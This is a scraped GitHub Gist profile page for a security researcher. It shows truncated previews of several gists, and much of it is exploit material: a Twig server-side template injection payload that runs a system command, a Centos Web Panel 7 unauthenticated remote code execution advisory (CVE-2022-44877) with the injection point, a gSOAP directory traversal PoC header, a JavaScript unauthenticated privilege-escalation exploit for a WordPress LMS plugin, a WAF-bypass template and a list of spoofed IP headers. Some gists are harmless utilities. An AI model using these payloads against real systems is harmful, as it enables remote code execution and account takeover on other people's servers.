Skip to content

Instantly share code, notes, and snippets.

View numanturle's full-sized avatar
🕳️

numan numanturle

🕳️
View GitHub Profile
@numanturle
numanturle / 1.twig
Created March 23, 2023 22:32
twig blacklist [ ]
{%set x={'1':'id'}%}{{x|filter('system')}}
@numanturle
numanturle / # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
Created January 5, 2023 21:44
# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877
[+] Centos Web Panel 7 Unauthenticated Remote Code Execution
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 141
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0 
Content-Type: application/json;charset=UTF-8
# Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap
POC
---------
@numanturle
numanturle / Exploit.js
Created January 30, 2022 10:51
MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)
function randomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
jQuery(document).ready(function($){
username = "poctesting"+randomInt(1,1337);
password_poc = "S3cr3t"+randomInt(1,1337);
nonce = stm_lms_nonces.stm_lms_register
post_data = {
@numanturle
numanturle / waf.yaml
Created August 29, 2022 11:15
waf.yaml
id: waf-bypass-numi
info:
name: waf-bypass-numi
author: numanture
requests:
- raw:
- |
GET /blabla HTTP/1.1
@numanturle
numanturle / elasticsearch.py
Created August 25, 2021 14:43
elasticsearch
import json
import sys
from time import sleep
from datetime import datetime
from elasticsearch import Elasticsearch, helpers
es = Elasticsearch("localhost:9200")
def create_index(index):
es.indices.create(index=index, ignore=400)
@numanturle
numanturle / solve-paradigm.py
Last active August 27, 2022 22:03
solve-paradigm.py
from solcx import compile_source
from web3 import Web3
setup_txt = open("Setup.sol", "r").read()
setup_compiled_source = compile_source(setup_txt, output_values=['abi'])
setup_abi = list(setup_compiled_source.items())[0][1]['abi']
random_txt = open("Random.sol", "r").read()
random_compiled_source = compile_source(random_txt, output_values=['abi'])
random_abi = list(random_compiled_source.items())[0][1]['abi']
@numanturle
numanturle / cloudflare-real.sh
Last active August 9, 2022 09:00
cloudflare real ip
#!/bin/bash
# Simple bash script to restore visitor real IP under Cloudflare with Nginx
# Script also whitelist cloudflare IP with UFW (if installed)
if [ "$1" = "--ufw" ]; then
CF_UFW_SETUP="y"
fi
if [ -z "$(command -v curl)" ]; then
echo "####################################"
@numanturle
numanturle / req.req
Created August 8, 2022 10:45
req.req
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1